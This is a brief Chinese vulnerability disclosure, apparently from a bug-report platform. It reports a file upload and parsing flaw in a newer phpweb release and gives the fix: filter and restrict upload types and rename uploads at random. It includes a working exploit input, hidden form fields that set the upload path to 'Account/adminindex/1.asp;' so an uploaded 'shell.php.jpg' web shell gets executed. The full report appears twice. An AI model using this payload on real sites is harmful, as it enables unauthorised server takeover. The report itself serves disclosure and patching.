漏洞详情简要描述:新版的phpweb 存在这上传和解析不当漏洞
详细说明:
<input type="hidden" name="filepath" value="Account/adminindex/1.asp;"> <input type="hidden" name="filelx" value="jpg"> |
漏洞证明:exp 上传shell.php.jpg
修复方案:过滤,对上传类型进行限制,并随机重命名上传文件
作者:livers
漏洞详情简要描述:新版的phpweb 存在这上传和解析不当漏洞
详细说明:
<input type="hidden" name="filepath" value="Account/adminindex/1.asp;"> <input type="hidden" name="filelx" value="jpg"> |
漏洞证明:exp 上传shell.php.jpg
修复方案:过滤,对上传类型进行限制,并随机重命名上传文件
作者:livers